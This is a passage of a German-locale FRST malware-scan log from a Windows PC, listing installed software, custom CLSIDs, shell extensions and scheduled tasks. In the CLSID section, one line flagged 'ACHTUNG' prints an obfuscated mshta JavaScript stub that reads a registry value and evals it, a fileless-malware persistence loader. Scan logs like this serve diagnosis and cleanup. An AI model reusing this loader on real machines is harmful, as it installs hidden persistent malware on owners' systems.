Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (ENU) (HKLM-x32\...\{290FC320-2F5A-329E-8840-C4193BD7A9EE}) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (HKLM-x32\...\{19E8AE59-4D4A-3534-B567-6CC08FA4102E}) (Version: 4.5.51651 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (HKLM-x32\...\{B5915D37-0637-4A26-A3AA-C5DC9F856370}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (ENU) (HKLM-x32\...\{034547E9-D8FA-49E7-8B9C-4C9861FB9146}) (Version: 4.6.00127 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (HKLM-x32\...\{2CC6A4A7-AAC2-46C9-9DBB-3727B5954F65}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (Deutsch) (HKLM-x32\...\{529EFF09-750D-48B9-A47A-34A3B6248C3F}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (HKLM-x32\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM-x32\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM-x32\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.7 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.7.02053 - Microsoft Corporation)
Microsoft .NET Framework 4.7 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02053 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.25420 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM-x32\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects (HKLM-x32\...\{2774595F-BC2A-4B12-A25B-0C37A37049B0}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects (x64) (HKLM\...\{1F9EB3B6-AED7-4AA7-B8F1-8E314B74B2A5}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom (HKLM\...\{020CDFE0-C127-4047-B571-37C82396B662}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 T-SQL Language Service (HKLM-x32\...\{47D08E7A-92A1-489B-B0BF-415516497BCE}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 x64 ENU (HKLM\...\{78909610-D229-459C-A936-25D92283D3FD}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{FC3BB979-AA54-4B60-BBA3-2C4DA6E08D80}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{091CE6AA-2753-4F6E-AD1C-0E875744EB54}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{307a22b8-8353-4c5e-b67b-2404c5734558}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{90ffcee5-8608-4e94-8c18-a4feb4f83fb8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual Studio 2015 Tools for Unity (HKLM-x32\...\{E02DF945-0531-4E5E-9C6B-2B660C0AE66D}) (Version: 2.8.0.0 - Microsoft Corporation)
Microsoft Visual Studio Code (HKLM\...\{EA457B21-F73E-494C-ACAB-524FDE069978}_is1) (Version: 1.16.1 - Microsoft Corporation)
Microsoft Visual Studio Community 2015 with Updates (HKLM-x32\...\{79b486b9-c5f0-4096-a00c-8351f59587c2}) (Version: 14.0.25420.1 - Microsoft Corporation)
Microsoft Web Deploy 3.6 (HKLM\...\{94E1227C-08A9-4962-B388-1F05D89AEA75}) (Version: 3.1238.1962 - Microsoft Corporation)
MongoDB 3.0.7 2008R2Plus SSL (64 bit) (HKLM\...\{40395681-4470-4EC8-B337-497C1E060E36}) (Version: 3.0.7 - MongoDB)
MongoDB 3.5.3 2008R2Plus SSL (64 bit) (HKLM\...\{8927DD90-62A9-4057-B695-4D0D7918C8ED}) (Version: 3.5.3 - MongoDB)
Movie Maker (HKLM-x32\...\{70C91B91-61E8-4D06-86D6-A9DCC291983A}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 55.0.3 (x86 de) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 de)) (Version: 55.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 55.0.3.6445 - Mozilla)
MSBuild/NuGet Integration 14.0 (x86) (HKLM-x32\...\{128C1654-3B9E-4959-8BFB-CE6F09C0A01D}) (Version: 14.0.25420 - Microsoft Corporation) Hidden
Multi-Device Hybrid Apps using C# - Templates - ENU (HKLM-x32\...\{12D99739-FFD3-3761-8AA6-F929E0FE407E}) (Version: 14.0.23107 - Microsoft Corporation) Hidden
MySQL Connector/ODBC 5.3 (HKLM-x32\...\{4C6A664C-DCA0-4CC6-8752-ED0850E3135A}) (Version: 5.3.4 - Oracle Corporation)
MySQL Workbench 6.3 CE (HKLM\...\{0D901124-B910-4985-9D4F-AC5C2FEF7493}) (Version: 6.3.7 - Oracle Corporation)
NetBeans IDE 8.1 (HKLM\...\nbi-nb-base-8.1.0.0.201510222201) (Version: 8.1 - NetBeans.org)
NetSpeedMonitor 2.5.4.0 x64 (HKLM\...\{88F41EE2-949B-4B52-933D-C7F8F67BC1D2}) (Version: 2.5.4.0 - Florian Gilles)
Node.js (HKLM\...\{6BA2207A-7E42-434C-8DD4-A2FFC1D9EA68}) (Version: 7.5.0 - Node.js Foundation)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.4.1 - Notepad++ Team)
NoteWorthy Composer 2 Demo (HKLM-x32\...\NoteWorthy Composer 2 Demo) (Version: Demo Version 2.75 - Noteworthy Software, Inc.)
OEM Application Profile (HKLM-x32\...\{315F1A48-D883-B234-7C79-15873574ACC1}) (Version: 1.00.0000 - Ihr Firmenname)
opensource (HKLM-x32\...\{3677D4D8-E5E0-49FC-B86E-06541CF00BBE}) (Version: 1.0.14960.3876 - Your Company Name) Hidden
OpenSSL 1.1.0f (32-bit) (HKLM-x32\...\OpenSSL (32-bit)_is1) (Version: - OpenSSL Win32 Installer Team)
Oracle Database 11g Express Edition (HKLM\...\{05A7B662-80A3-4EB9-AE1D-89A62449431C}) (Version: 11.2.0 - Oracle Corporation) Hidden
Oracle Database 11g Express Edition (HKLM-x32\...\InstallShield_{05A7B662-80A3-4EB9-AE1D-89A62449431C}) (Version: 11.2.0 - Oracle Corporation)
Oracle VM VirtualBox 5.0.24 (HKLM\...\{BA15D402-19CA-493E-958B-170A0C446F25}) (Version: 5.0.24 - Oracle Corporation)
Paket zur Festlegung von Zielversionen für Microsoft .NET Framework 4.6.1 (Deutsch) (HKLM-x32\...\{4860C1E5-CE58-4D32-89DE-37951333B4C9}) (Version: 4.6.01055 - Microsoft Corporation)
PostgreSQL (HKLM\...\PostgreSQL 9.6) (Version: 9.6 - BigSQL)
PreEmptive Analytics Visual Studio Components (HKLM-x32\...\{436A18DD-5F2C-4B3C-985E-AD3C13B0CC25}) (Version: 1.2.5134.1 - PreEmptive Solutions) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.21249 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.80.218.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7195 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{A5107464-AA9B-4177-8129-5FF2F42DD322}) (Version: 1.00.13.1216 - REALTEK Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Roslyn Language Services - x86 (HKLM-x32\...\{6970C7E1-F99D-388D-8903-DF8FCE677FED}) (Version: 14.0.25431 - Microsoft Corporation) Hidden
Roslyn Language Services - x86 (HKLM-x32\...\{6C1985E7-E1C5-3A95-86EF-2C62465F15C3}) (Version: 14.0.23107 - Microsoft Corporation) Hidden
Ruby 2.1.7-p400 (HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\{64763A89-6347-43AF-833F-3840615C62AE}_is1) (Version: 2.1.7-p400 - RubyInstaller Team)
SceneBuilder (HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\{com.oracle.javafx.scenebuilder.app}}_is1) (Version: 8.0.0 - Gluon)
Skype™ 7.40 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.40.103 - Skype Technologies S.A.)
SourceTree (HKLM-x32\...\{41228703-04A1-4670-BE4D-9C519977041E}) (Version: 1.9.10.0 - Atlassian) Hidden
SourceTree (HKLM-x32\...\SourceTree 1.9.10.0) (Version: 1.9.10.0 - Atlassian)
Steinberg Cubase 5 (HKLM-x32\...\{4A19D6AC-ADE0-4A07-80FF-9C9812C45557}) (Version: 5.1.0 - Steinberg Media Technologies GmbH)
Steinberg Drum Loop Expansion 01 (HKLM-x32\...\{490BF87E-1F75-4453-BF55-9F540543A3CA}) (Version: 1.0.0.1 - Steinberg Media Technologies GmbH)
Steinberg Groove Agent ONE Content (HKLM-x32\...\{BD86F1AC-B594-46E4-85DC-1258AC9E2232}) (Version: 1.0.0.003 - Steinberg Media Technologies GmbH)
Steinberg HALionOne (HKLM-x32\...\{E70E7159-93B1-470D-9FBD-D8E9EF34B538}) (Version: 1.1.0.457 - Steinberg Media Technologies GmbH)
Steinberg HALionOne Additional Content Set 01 (HKLM-x32\...\{F3AFD063-8BAD-485E-B641-E7F5A2C5AE71}) (Version: 1.0.0.001 - Steinberg Media Technologies GmbH)
Steinberg HALionOne Expression Set (HKLM-x32\...\{E22AD5D3-EB60-4A8F-835C-6C10E369DCE2}) (Version: 1.0.1.0 - Steinberg Media Technologies GmbH)
Steinberg HALionOne GM Drum Set (HKLM-x32\...\{AC997F93-0757-4ED4-A701-F40C2D654D09}) (Version: 1.0.1.457 - Steinberg Media Technologies GmbH)
Steinberg HALionOne GM Set (HKLM-x32\...\{F057965A-D974-4C64-ADB1-4381CD4B8956}) (Version: 1.0.1.457 - Steinberg Media Technologies GmbH)
Steinberg HALionOne Pro Set (HKLM-x32\...\{D82CDA0D-C182-42C8-8FF2-5649C98D6003}) (Version: 1.0.1.457 - Steinberg Media Technologies GmbH)
Steinberg HALionOne Studio Drum Set (HKLM-x32\...\{865D9ED1-EAC2-436D-AFA7-0B750EB5AAAB}) (Version: 1.0.1.457 - Steinberg Media Technologies GmbH)
Steinberg HALionOne Studio Set (HKLM-x32\...\{D23CBFDA-C46B-4920-BA70-FC7878A3F05A}) (Version: 1.0.1.457 - Steinberg Media Technologies GmbH)
Steinberg LoopMash Content (HKLM-x32\...\{4D454CF8-12FD-464D-B57B-B46FE27B78BB}) (Version: 1.0.0.005 - Steinberg Media Technologies GmbH)
Steinberg REVerence Content 01 (HKLM-x32\...\{532B917B-8235-4FA5-BE36-643A8BB053A5}) (Version: 1.0.0.006 - Steinberg Media Technologies GmbH)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.95 - Synaptics Incorporated)
Team Explorer for Microsoft Visual Studio 2015 Update 3.1 (HKLM-x32\...\{7A95671A-759E-3B83-B763-4289D1D24D73}) (Version: 14.102.25619 - Microsoft) Hidden
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.83369 - TeamViewer)
Test Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{9EABBFE1-7EED-47D9-8FB8-21D7E4808057}) (Version: 14.0.23107 - Microsoft Corporation) Hidden
TypeScript Power Tool (HKLM-x32\...\{465ACA24-B8D6-4FEC-A42D-9EFCB92CD560}) (Version: 1.8.34.0 - Microsoft Corporation) Hidden
TypeScript Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{BA5762C7-D35F-4725-A4BD-525854127018}) (Version: 1.8.36.0 - Microsoft Corporation) Hidden
Unity (HKLM-x32\...\Unity) (Version: 5.5.0f3 - Unity Technologies ApS)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Update for (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM-x32\...\{90120000-0016-0407-0000-0000000FF1CE}_ENTERPRISE_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version: - Microsoft)
Update für Microsoft Office Outlook 2007 Help (KB963677) (HKLM-x32\...\{90120000-001A-0407-0000-0000000FF1CE}_ENTERPRISE_{F6828576-6F79-470D-AB50-69D1BBADBD30}) (Version: - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM-x32\...\{90120000-0018-0407-0000-0000000FF1CE}_ENTERPRISE_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version: - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM-x32\...\{90120000-001B-0407-0000-0000000FF1CE}_ENTERPRISE_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version: - Microsoft)
Validity WBF DDK (HKLM\...\{DB87BB79-2BDF-424E-A534-6F29C402AF46}) (Version: 4.5.246.0 - Validity Sensors, Inc.)
Visual Paradigm CE 14.0 (HKLM\...\1106-5897-7327-6550) (Version: 14.0 - Visual Paradigm International Ltd.)
Visual Studio 2015 Update 3 (KB3022398) (HKLM-x32\...\{7a68448b-9cf2-4049-bd73-5875f1aa7ba2}) (Version: 14.0.25420 - Microsoft Corporation)
VS Update core components (HKLM-x32\...\{B2918D01-1D89-34D3-87EF-A28121BC6EB7}) (Version: 14.0.25431 - Microsoft Corporation) Hidden
vs_update3notification (HKLM-x32\...\{AB3DF932-C990-34D4-BF43-970F760DA3CD}) (Version: 14.0.25431 - Microsoft Corporation) Hidden
WCF Data Services 5.6.4 Runtime (HKLM-x32\...\{DB85E7BD-B2DD-43D4-B3C0-23D7B527B597}) (Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{0A3B508E-5638-4471-BCC9-954E1868CB86}) (Version: 5.6.62175.4 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
XAMPP (HKLM-x32\...\xampp) (Version: 7.1.7-0 - Bitnami)
yEd Graph Editor 3.17 (HKLM\...\3309-7404-0599-8908) (Version: 3.17 - yWorks GmbH)
Zoom (HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\ZoomUMX) (Version: 4.0 - Zoom Video Communications, Inc.)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-1772142865-3804567698-3626976838-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\xxxxxx\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1772142865-3804567698-3626976838-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\xxxxxx\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-1772142865-3804567698-3626976838-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\xxxxxx\AppData\Local\Citrix\GoToMeeting\4431\G2MOutlookAddin64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-1772142865-3804567698-3626976838-1001_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\xxxxxx\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-1772142865-3804567698-3626976838-1001_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\xxxxxx\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-1772142865-3804567698-3626976838-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\xxxxxx\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\Software\Classes\ngil: "C:\Windows\system32\mshta.exe" "javascript:hB3OZ3z="Ftp";FA1=new ActiveXObject("WScript.Shell");xLPXI7M="DTrcITN1";NtE6O7=FA1.RegRead("HKCU\\software\\cqcyivd\\uonp");r93rTBHt="w";eval(NtE6O7);Gc9ie7Bw="0oBTA0g";" <==== ACHTUNG
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Keine Datei
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\projects\Notepad++\NppShell_06.dll [2017-05-18] ()
ContextMenuHandlers1: [BtSendToMenuEx] -> {CF24E6B8-F148-4BCB-9108-ADF313966E80} => C:\Program Files (x86)\REALTEK\Realtek Bluetooth\DevMenuExt.dll [2014-01-06] (Realtek Semiconductor Corporation)
ContextMenuHandlers1: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => C:\Program Files (x86)\Common Files\CyberLink\ShellExtComponent\CLVDShellExt.dll [2014-02-21] (Cyberlink)
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers1: [LockHunterShellExt] -> {0BB27CDA-7029-4C0E-9C56-D922B229F0EB} => C:\projects\LockHunter\LHShellExt64.dll [2013-11-21] (Crystal Rich Ltd)
ContextMenuHandlers2: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => C:\Program Files (x86)\Common Files\CyberLink\ShellExtComponent\CLVDShellExt.dll [2014-02-21] (Cyberlink)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers2: [LockHunterShellExt] -> {0BB27CDA-7029-4C0E-9C56-D922B229F0EB} => C:\projects\LockHunter\LHShellExt64.dll [2013-11-21] (Crystal Rich Ltd)
ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Keine Datei
ContextMenuHandlers3: [UnlockerShellExtension] -> {DDE4BEEB-DDE6-48fd-8EB5-035C09923F83} => C:\projects\Unlocker\UnlockerCOM.dll [2010-07-15] ()
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers4: [LockHunterShellExt] -> {0BB27CDA-7029-4C0E-9C56-D922B229F0EB} => C:\projects\LockHunter\LHShellExt64.dll [2013-11-21] (Crystal Rich Ltd)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\atiacmxx.dll -> Keine Datei
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers6: [UnlockerShellExtension] -> {DDE4BEEB-DDE6-48fd-8EB5-035C09923F83} => C:\projects\Unlocker\UnlockerCOM.dll [2010-07-15] ()
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {076A7066-A872-46C1-832C-4DBBF8D29E38} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1772142865-3804567698-3626976838-1001Core => C:\Users\xxxxxx\AppData\Local\Google\Update\GoogleUpdate.exe [2016-09-15] (Google Inc.)
Task: {1D9C07AA-F0A0-42CB-98B9-AD305816C1AD} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-07-13] (AVAST Software)
Task: {23039313-3DA1-484A-BE34-13F3DF78108E} - System32\Tasks\{FDBDB83B-E748-4D3E-B356-89315C46DCBE} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\BlueStacks\HD-RuntimeUninstaller.exe"
Task: {274CB371-F96F-47BB-BF20-4EC8A5420E84} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1772142865-3804567698-3626976838-1001UA => C:\Users\xxxxxx\AppData\Local\Google\Update\GoogleUpdate.exe [2016-09-15] (Google Inc.)
Task: {36D6588B-2125-4D72-98FC-ABB1D7534759} - System32\Tasks\HPCeeScheduleForxxxxxx => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {7FD7F98F-F8C0-40DB-9C22-B7339189F45F} - System32\Tasks\G2MUploadTask-S-1-5-21-1772142865-3804567698-3626976838-1001 => C:\Users\xxxxxx\AppData\Local\GoToMeeting\7716\g2mupload.exe [2017-10-01] (LogMeIn, Inc.)
Task: {8E2571BC-A167-4093-A1CD-D33DD795FB67} - System32\Tasks\Microsoft\VisualStudio\VSIX Auto Update 14 => C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\VSIXAutoUpdate.exe [2016-06-20] (Microsoft Corporation)
Task: {9598DF6A-45F9-4FD9-825A-1FCCDFE95310} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFReport.exe [2016-02-18] (Hewlett-Packard)
Task: {9B886B7E-F3C7-4895-B83B-57CF6A9B987A} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {9CA35078-803B-4509-B0C3-EEE63BC51B50} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2013-11-01] (Hewlett-Packard Development Company, L.P.)
